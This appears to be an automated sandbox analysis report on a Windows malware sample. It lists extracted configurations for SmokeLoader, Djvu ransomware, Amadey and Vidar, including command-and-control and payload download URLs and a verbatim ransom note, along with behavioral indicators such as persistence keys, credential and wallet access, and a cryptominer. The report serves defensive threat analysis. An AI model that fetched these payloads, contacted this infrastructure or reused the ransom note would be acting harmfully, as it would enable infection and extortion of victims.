Resubmissions
20-04-2023 18:50
230420-xg91tabg36 1020-04-2023 18:34
230420-w75y4sbf75 1019-04-2023 13:11
230419-qe8xeaaf68 1012-01-2023 04:39
230112-e91zhaba6w 1012-01-2023 02:36
230112-c3xx6aeh99 10Analysis
-
max time kernel
686s -
max time network
931s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
20-04-2023 18:34
Static task
static1
Behavioral task
behavioral1
Sample
5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe
Resource
win10v2004-20230220-en
General
-
Target
5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d.exe
-
Size
321KB
-
MD5
dfc9518f5e0b145f1fa786628670863d
-
SHA1
a54e4137ccf90fd1326509874063bd58c20fd1ed
-
SHA256
5eb8103fce78104972cfb45b1242d003f9e66d2da920c7aa5742e185822d3f4d
-
SHA512
d67aaeccce8629b38c918e97c5ffbd09a6f9395a73cac88e9a7d795e36f0ba6b51a59a4d65e84836bea44568054f00b2f4bb74d4c8d591c01d254f127e110a8e
-
SSDEEP
3072:xXOGnVaMz9JltM5JxSmp6jUO4QRLaSmKLs8FlguE1igK56n6dF8M/WhJshp2BTBp:VJr1tcxSmJMm6FlgLde6n6dO6Wyg
Malware Config
Extracted
smokeloader
2022
http://potunulit.org/
http://hutnilior.net/
http://bulimu55t.net/
http://soryytlic4.net/
http://novanosa5org.org/
http://nuljjjnuli.org/
http://tolilolihul.net/
http://somatoka51hub.net/
http://hujukui3.net/
http://bukubuka1.net/
http://golilopaster.org/
http://newzelannd66.org/
http://otriluyttn.org/
http://aapu.at/tmp/
http://poudineh.com/tmp/
http://firsttrusteedrx.ru/tmp/
http://kingpirate.ru/tmp/
Extracted
djvu
http://zexeq.com/lancer/get.php
-
extension
.coty
-
offline_id
O8Ao46dcCReRPC4I1PGMYsRFFc9WI5eOp0O3MFt1
-
payload_url
http://colisumy.com/dl/build2.exe
http://zexeq.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-EPBZCVAS8s Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0692JOsie
Extracted
amadey
3.70
77.73.134.27/n9kdjc3xSf/index.php
Extracted
smokeloader
pub1
Extracted
smokeloader
sprg
Extracted
vidar
3.5
bf58e1879f88b222ba2391682babf9d8
https://steamcommunity.com/profiles/76561199497218285
https://t.me/tg_duckworld
-
profile_id_v2
bf58e1879f88b222ba2391682babf9d8
-
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Vivaldi/3.7
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect rhadamanthys stealer shellcode 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1720-1631-0x0000000002440000-0x000000000245C000-memory.dmp family_rhadamanthys behavioral2/memory/1720-1674-0x0000000002440000-0x000000000245C000-memory.dmp family_rhadamanthys -
Detected Djvu ransomware 30 IoCs
Processes:
resource yara_rule behavioral2/memory/6104-241-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/6104-243-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/6036-244-0x00000000025B0000-0x00000000026CB000-memory.dmp family_djvu behavioral2/memory/6104-245-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/6104-246-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/6104-256-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5464-265-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5464-266-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5464-275-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5464-278-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5464-305-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5464-327-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5464-329-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5464-331-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5984-351-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5984-352-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5984-358-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5984-361-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5464-372-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5828-382-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5828-383-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5828-388-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5828-401-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5828-397-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5828-393-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5828-389-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5828-441-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5464-13295-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5828-13315-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5516-13480-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
Processes:
XandETC.exeupdater.execonhost.exedescription pid process target process PID 5216 created 3220 5216 XandETC.exe Explorer.EXE PID 5216 created 3220 5216 XandETC.exe Explorer.EXE PID 5216 created 3220 5216 XandETC.exe Explorer.EXE PID 5216 created 3220 5216 XandETC.exe Explorer.EXE PID 5216 created 3220 5216 XandETC.exe Explorer.EXE PID 2092 created 3220 2092 updater.exe Explorer.EXE PID 2092 created 3220 2092 updater.exe Explorer.EXE PID 2092 created 3220 2092 updater.exe Explorer.EXE PID 2092 created 3220 2092 updater.exe Explorer.EXE PID 2092 created 3220 2092 updater.exe Explorer.EXE PID 4588 created 3220 4588 conhost.exe Explorer.EXE PID 2092 created 3220 2092 updater.exe Explorer.EXE -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2384-2146-0x00007FF645300000-0x00007FF645AF4000-memory.dmp xmrig behavioral2/memory/2384-2254-0x00007FF645300000-0x00007FF645AF4000-memory.dmp xmrig -
Downloads MZ/PE file
-
Modifies Installed Components in the registry 2 TTPs 2 IoCs
Processes:
Roblox Mod Menu.exetv_enua.exedescription ioc process Key created \REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components Roblox Mod Menu.exe Key created \REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components tv_enua.exe -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 16 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Roblox Mod Menu.exeF09.exeRoblox Mod Menu.exeoneetx.exebuild2.exebuild2.exeBonziBuddy432.exeRoblox Mod Menu.exeRoblox Mod Menu.exeEFF3.exebuild3.exeWScript.exeRoblox Mod Menu.exeF09.exe1A8.exeEFF3.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation Roblox Mod Menu.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation F09.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation Roblox Mod Menu.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation oneetx.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation build2.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation build2.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation BonziBuddy432.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation Roblox Mod Menu.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation Roblox Mod Menu.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation EFF3.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation build3.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation Roblox Mod Menu.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation F09.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation 1A8.exe Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation EFF3.exe -
Executes dropped EXE 59 IoCs
Processes:
EE9B.exeEFF3.exeEFF3.exeEFF3.exe1A8.exeEFF3.exess31.exebuild3.exeXandETC.exe7C3.exeoneetx.exeAE1.exeF09.exebuild2.exeF09.exebuild2.exeF09.exebuild3.exeF09.exe1E7B.exe260D.exe2821.exebuild2.exebuild2.exeoneetx.exemstsca.exe9D62.exeupdater.exeoneetx.exeRoblox Mod Menu.exeoneetx.exeoneetx.exehtswgbatcswgbaBonziBuddy432.exeoneetx.exeRoblox Mod Menu.exetv_enua.exeAgentSvr.exeoneetx.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeoneetx.exeoneetx.exeBonziBDY_4.EXEAgentSvr.exeoneetx.exeoneetx.exepid process 5992 EE9B.exe 6036 EFF3.exe 6104 EFF3.exe 5400 EFF3.exe 5432 1A8.exe 5464 EFF3.exe 4452 ss31.exe 5656 build3.exe 5216 XandETC.exe 4008 7C3.exe 5324 oneetx.exe 5384 AE1.exe 5740 F09.exe 336 build2.exe 5984 F09.exe 6044 build2.exe 3472 F09.exe 5424 build3.exe 5828 F09.exe 5808 1E7B.exe 5292 260D.exe 5652 2821.exe 5040 build2.exe 4148 build2.exe 5656 build3.exe 2572 oneetx.exe 6096 mstsca.exe 1720 9D62.exe 2092 updater.exe 4840 oneetx.exe 4132 Roblox Mod Menu.exe 2852 oneetx.exe 4712 oneetx.exe 4688 htswgba 5808 tcswgba 4932 BonziBuddy432.exe 820 oneetx.exe 3172 Roblox Mod Menu.exe 368 tv_enua.exe 3300 AgentSvr.exe 3204 oneetx.exe 5528 Roblox Mod Menu.exe 3172 Roblox Mod Menu.exe 1640 Roblox Mod Menu.exe 2952 Roblox Mod Menu.exe 5204 Roblox Mod Menu.exe 2200 Roblox Mod Menu.exe 1540 Roblox Mod Menu.exe 3100 Roblox Mod Menu.exe 5108 Roblox Mod Menu.exe 4132 Roblox Mod Menu.exe 2244 Roblox Mod Menu.exe 3940 Roblox Mod Menu.exe 5876 oneetx.exe 3872 oneetx.exe 5424 BonziBDY_4.EXE 2496 AgentSvr.exe 4352 oneetx.exe 980 oneetx.exe -
Loads dropped DLL 64 IoCs
Processes:
build2.exebuild2.exeBonziBuddy432.exeRoblox Mod Menu.exeregsvr32.exefirefox.exeregsvr32.exeregsvr32.exemsedge.exeregsvr32.exeregsvr32.exetv_enua.exefirefox.exeregsvr32.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exeRoblox Mod Menu.exepid process 6044 build2.exe 6044 build2.exe 4148 build2.exe 4148 build2.exe 4932 BonziBuddy432.exe 4932 BonziBuddy432.exe 4932 BonziBuddy432.exe 4932 BonziBuddy432.exe 4932 BonziBuddy432.exe 4932 BonziBuddy432.exe 4932 BonziBuddy432.exe 4932 BonziBuddy432.exe 4932 BonziBuddy432.exe 4932 BonziBuddy432.exe 4932 BonziBuddy432.exe 3172 Roblox Mod Menu.exe 4480 regsvr32.exe 3324 firefox.exe 2352 regsvr32.exe 5068 regsvr32.exe 5304 msedge.exe 4792 regsvr32.exe 5924 regsvr32.exe 368 tv_enua.exe 688 firefox.exe 688 firefox.exe 512 regsvr32.exe 3172 Roblox Mod Menu.exe 1640 Roblox Mod Menu.exe 5204 Roblox Mod Menu.exe 2952 Roblox Mod Menu.exe 1640 Roblox Mod Menu.exe 1640 Roblox Mod Menu.exe 1640 Roblox Mod Menu.exe 1640 Roblox Mod Menu.exe 1640 Roblox Mod Menu.exe 2200 Roblox Mod Menu.exe 2200 Roblox Mod Menu.exe 2200 Roblox Mod Menu.exe 2200 Roblox Mod Menu.exe 2200 Roblox Mod Menu.exe 2200 Roblox Mod Menu.exe 1540 Roblox Mod Menu.exe 1540 Roblox Mod Menu.exe 1540 Roblox Mod Menu.exe 1540 Roblox Mod Menu.exe 1540 Roblox Mod Menu.exe 1540 Roblox Mod Menu.exe 3100 Roblox Mod Menu.exe 3100 Roblox Mod Menu.exe 3100 Roblox Mod Menu.exe 3100 Roblox Mod Menu.exe 3100 Roblox Mod Menu.exe 3100 Roblox Mod Menu.exe 5108 Roblox Mod Menu.exe 5108 Roblox Mod Menu.exe 5108 Roblox Mod Menu.exe 5108 Roblox Mod Menu.exe 5108 Roblox Mod Menu.exe 5108 Roblox Mod Menu.exe 4132 Roblox Mod Menu.exe 4132 Roblox Mod Menu.exe 4132 Roblox Mod Menu.exe 4132 Roblox Mod Menu.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/2384-2146-0x00007FF645300000-0x00007FF645AF4000-memory.dmp upx behavioral2/memory/2384-2254-0x00007FF645300000-0x00007FF645AF4000-memory.dmp upx -
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
Processes:
dllhost.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook dllhost.exe Key opened \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook dllhost.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
EFF3.exetv_enua.exeRoblox Mod Menu.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ab3c080d-cce8-4707-aacc-e96b611578e9\\EFF3.exe\" --AutoStart" EFF3.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce tv_enua.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\tv_enua = "RunDll32 advpack.dll,LaunchINFSection C:\\Windows\\INF\\tv_enua.inf, RemoveCabinet" tv_enua.exe Key created \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Software\Microsoft\Windows\CurrentVersion\Run Roblox Mod Menu.exe Set value (str) \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox Mod Menu = "C:\\Users\\Admin\\AppData\\Roaming\\Roblox Mod Menu\\Roblox Mod Menu.exe" Roblox Mod Menu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 68 api.2ip.ua 69 api.2ip.ua 79 api.2ip.ua 97 api.2ip.ua 98 api.2ip.ua 1772 api.2ip.ua 1773 api.2ip.ua -
Drops file in System32 directory 6 IoCs
Processes:
powershell.exepowershell.exetv_enua.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\SET43BC.tmp tv_enua.exe File created C:\Windows\SysWOW64\SET43BC.tmp tv_enua.exe File opened for modification C:\Windows\SysWOW64\msvcp50.dll tv_enua.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
EFF3.exeEFF3.exeF09.exebuild2.exeF09.exebuild2.exeupdater.exedescription pid process target process PID 6036 set thread context of 6104 6036 EFF3.exe EFF3.exe PID 5400 set thread context of 5464 5400 EFF3.exe EFF3.exe PID 5740 set thread context of 5984 5740 F09.exe F09.exe PID 336 set thread context of 6044 336 build2.exe build2.exe PID 3472 set thread context of 5828 3472 F09.exe F09.exe PID 5040 set thread context of 4148 5040 build2.exe build2.exe PID 2092 set thread context of 4588 2092 updater.exe conhost.exe PID 2092 set thread context of 2384 2092 updater.exe conhost.exe -
Drops file in Program Files directory 64 IoCs
Processes:
firefox.exefirefox.exeBonziBuddy432.exefirefox.exeBonziBDY_4.EXEdescription ioc process File opened for modification C:\Program Files\Mozilla Firefox\symbols\dll\cryptbase.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\nss3.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page10.jpg BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Runtimes\MSAGENT.EXE BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\BG\Bg2.bmp BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page7.jpg BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\kernelbase.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\RACREG32.DLL BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\combase.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\vcruntime140.amd64.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\symbols\dll\msvcp_win.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\winmm.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\CHORD.WAV BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\SSubTmr6.dll BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page8.jpg BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\msvbvm60.dll BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page12.jpg BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page3.jpg BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\cryptbase.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\cryptbase.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\J001.nbd-SR BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\msasn1.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page10.jpg BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\mozglue.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\ucrtbase.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Options\chose.bat BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\cryptbase.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\symbols\dll\oleaut32.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\wsock32.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Bonzi's Beach Checkers.exe BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb002.gif BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\symbols\dll\xul.pdb firefox.exe File created C:\Program Files (x86)\BonziBuddy432\Reg.nbd.temp BonziBDY_4.EXE File opened for modification C:\Program Files\Mozilla Firefox\softokn3.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\sstabs2.ocx BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\msvcp140.amd64.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\symbols\DLL\dbgcore.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page11.jpg BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page7.jpg BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page1.jpg BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\crypt32.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\symbols\dll\dbghelp.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\DWrite.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Reg.nbd BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page11.jpg BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\symbols\dll\kernelbase.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\BonziCheckers.ocx BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\ws2_32.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\BonziBDY_35.EXE BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\nss3.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page12.jpg BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page4.jpg BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page7.jpg BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\mozglue.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\dll\msvcrt.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Options\fix.bat BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\symbols\dll\softokn3.pdb firefox.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb011.gif BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page4.jpg BonziBuddy432.exe File opened for modification C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp005.gif BonziBuddy432.exe File opened for modification C:\Program Files\Mozilla Firefox\nss3.pdb firefox.exe File opened for modification C:\Program Files\Mozilla Firefox\kernelbase.pdb firefox.exe -
Drops file in Windows directory 56 IoCs
Processes:
Roblox Mod Menu.exetv_enua.exeBonziBuddy432.exedescription ioc process File opened for modification C:\Windows\msagent\SET3B4C.tmp Roblox Mod Menu.exe File created C:\Windows\msagent\SET3B4C.tmp Roblox Mod Menu.exe File created C:\Windows\INF\SET3B72.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\INF\agtinst.inf Roblox Mod Menu.exe File created C:\Windows\msagent\SET3B86.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\AgtCtl15.tlb Roblox Mod Menu.exe File created C:\Windows\msagent\SET3B5F.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\AgentMPx.dll Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\SET3B5E.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\intl\SET3B75.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\lhsp\help\SET43B9.tmp tv_enua.exe File opened for modification C:\Windows\fonts\SET43BA.tmp tv_enua.exe File created C:\Windows\INF\SET43BB.tmp tv_enua.exe File opened for modification C:\Windows\msagent\AgentCtl.dll Roblox Mod Menu.exe File created C:\Windows\msagent\SET3B61.tmp Roblox Mod Menu.exe File created C:\Windows\msagent\SET3B73.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\lhsp\tv\SET43B7.tmp tv_enua.exe File created C:\Windows\msagent\SET3B4D.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\AgentDp2.dll Roblox Mod Menu.exe File opened for modification C:\Windows\help\SET3B74.tmp Roblox Mod Menu.exe File created C:\Windows\lhsp\tv\SET43B8.tmp tv_enua.exe File opened for modification C:\Windows\msagent\chars\Peedy.acs BonziBuddy432.exe File created C:\Windows\msagent\SET3B5E.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\AgentPsh.dll Roblox Mod Menu.exe File opened for modification C:\Windows\fonts\andmoipa.ttf tv_enua.exe File opened for modification C:\Windows\msagent\AgentSvr.exe Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\AgentAnm.dll Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\SET3B71.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\lhsp\tv\tv_enua.dll tv_enua.exe File created C:\Windows\msagent\SET3B4B.tmp Roblox Mod Menu.exe File created C:\Windows\msagent\SET3B71.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\INF\SET3B72.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\mslwvtts.dll Roblox Mod Menu.exe File opened for modification C:\Windows\help\Agt0409.hlp Roblox Mod Menu.exe File opened for modification C:\Windows\lhsp\tv\SET43B8.tmp tv_enua.exe File created C:\Windows\lhsp\help\SET43B9.tmp tv_enua.exe File opened for modification C:\Windows\INF\SET43BB.tmp tv_enua.exe File opened for modification C:\Windows\msagent\SET3B4B.tmp Roblox Mod Menu.exe File opened for modification C:\Windows\msagent\SET3B61.tmp Roblox Mod Menu.exe File opened for modification 